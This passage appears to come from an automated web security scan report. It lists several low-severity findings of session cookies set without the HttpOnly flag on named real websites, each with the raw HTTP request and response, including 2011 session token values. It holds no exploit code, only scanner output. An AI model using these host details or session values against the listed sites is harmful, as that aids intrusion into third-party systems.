<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...

15.25. https://secure.mightyblue.com/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mightyblue.com
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /default.asp HTTP/1.1
Host: secure.mightyblue.com
Connection: keep-alive
Referer: http://mightyblue.com/
Cache-Control: max-age=0
Origin: http://mightyblue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 107

selInterface=standard_XP&returnurl=http%3A%2F%2Fwww.mightyblue.com&txtUsername=&txtPassword=&submit22=Login

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:27:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 5889
Content-Type: text/html
Expires: Sun, 01 May 2011 21:27:32 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCBBBCAS=INBIJAJDCGCANBAFADADOAKF; path=/
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...

15.26. http://technology.searchcio-midmarket.com/kw  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://technology.searchcio-midmarket.com
Path:   /kw

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kw HTTP/1.1
Host: technology.searchcio-midmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.5
Pragma: no-cache
Cache-Control: no-cache
Expires: 0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en
Set-Cookie: JSESSIONID=abciclqX8qHL2b3JM0Y_s; path=/
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Mon, 02 May 2011 22:27:04 GMT
Content-Length: 17205

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Sear
...[SNIP]...

15.27. http://technorati.com/faves  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://technorati.com
Path:   /faves

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /faves HTTP/1.1
Host: technorati.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:27:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: tvisitor=10.15.116.210.1304376345698242; path=/; expires=Sat, 30-Apr-16 22:45:45 GMT; domain=.technorati.com
Set-Cookie: NEWTRSESSID=63ab477fb51fe4463fa523fe6b49ec5a; expires=Wed, 03-Aug-2011 22:27:06 GMT; path=/; domain=technorati.com
Vary: Accept-Encoding
Connection: close


15.28. http://webshop.elsevier.com/specialissues/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://webshop.elsevier.com
Path:   /specialissues/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /specialissues/?PII=S0957-4174(10)X0010-0 HTTP/1.1
Host: webshop.elsevier.com
Proxy-Connection: keep-alive
Referer: http://www.elsevier.com/wps/find/journaldescription.cws_home/939/description
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=1230653;path=/
Set-Cookie: CFTOKEN=32454531;path=/
Set-Cookie: ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D02%2000%3A00%3A00%27%7D;expires=Wed, 24-Apr-2041 21:31:17 GMT;path=/
Date: Mon, 02 May 2011 21:31:16 GMT
Content-Length: 17267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com
...[SNIP]...

15.29. http://websystem.ilsole24ore.com/jsp/Experteer_SGR_qi_100617_img.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://websystem.ilsole24ore.com
Path:   /jsp/Experteer_SGR_qi_100617_img.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/Experteer_SGR_qi_100617_img.jsp HTTP/1.1
Host: websystem.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1304392432178-New; s_lastvisit=1304392432179; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 May 2011 22:14:05 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch
Set-Cookie: JSESSIONID=B46049073F7B7F9881943AEA2DEE4830; Path=/jsp
Location: http://adv.ilsole24ore.it/RealMedia/ads/adstream_nx.ads/www.ilsole24ore.it/10/cobrand_experteer@x62
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 0


15.30. http://websystem.ilsole24ore.com/jsp/Guidaffari_SHW_qi_090114_img.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://websystem.ilsole24ore.com
Path:   /jsp/Guidaffari_SHW_qi_090114_img.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/Guidaffari_SHW_qi_090114_img.jsp HTTP/1.1
Host: websystem.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 May 2011 22:14:02 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch
Set-Cookie: JSESSIONID=61EF80E340B75E472EEBC0C0202B46D0; Path=/jsp
Location: http://adv.ilsole24ore.it/RealMedia/ads/adstream_nx.ads/advertising.ilsole24ore.com/2009/Guidaffari@x14
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 0


15.31. http://websystem.ilsole24ore.com/jsp/PortaleAutomob_SGR_qi_081104_HTMGIF.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://websystem.ilsole24ore.com
Path:   /jsp/PortaleAutomob_SGR_qi_081104_HTMGIF.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/PortaleAutomob_SGR_qi_081104_HTMGIF.jsp HTTP/1.1
Host: websystem.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1304392432178-New; s_lastvisit=1304392432179; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 May 2011 22:14:05 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch
Set-Cookie: JSESSIONID=D234DFFB0E233571FFF6FCFEC394BBC1; Path=/jsp
Location: http://adv.ilsole24ore.it/RealMedia/ads/adstream_nx.ads/www.ilsole24ore.it/08/cobrand_portale_automobilista@x75
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 0


15.32. http://www.applications.sciverse.com/action/appDetail/292639  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.applications.sciverse.com
Path:   /action/appDetail/292639

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /action/appDetail/292639 HTTP/1.1
Host: www.applications.sciverse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:29:19 GMT
Server: www.applications.sciverse.com 9999
Location: http://www.applications.sciverse.com/action/userhome
Content-Length: 0
Set-Cookie: JSESSIONID=0001aGFalo1QTnjVo3O-GQjgJCK:15gmm1282; Path=/
Set-Cookie: amp.machine.id.cookie=aGFalo1QTnjVo3O-GQjgJCK; Expires=Sun, 21 May 2079 01:43:24 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/plain
Content-Language: en-US
Connection: close
X-RE-Ref: 1 -1914337877
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


15.33. http://www.autostrade.it/autostrade/isMobile.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.autostrade.it
Path:   /autostrade/isMobile.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /autostrade/isMobile.do HTTP/1.1
Host: www.autostrade.it
Proxy-Connection: keep-alive
Referer: http://www.autostrade.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:13:32 GMT
Server: Autostrade
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
x-wily-info: Clear guid=B2C604397F0000015854E99FC00F33B9
x-wily-servlet: Clear appServerIp=127.0.0.1&agentName=bau10&servletName=ActionServlet&agentHost=n0611733&agentProcess=JBoss
Set-Cookie: JSESSIONID=99A6B622412B24DBC05018F5AF4B46BC.bau10; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript;charset=UTF-8
Content-Language: it
Content-Length: 272


var isMobile="noMobile";
var risoluzione="";

var abilitaControlloMobile=true;
if (abilitaControlloMobile && document.lo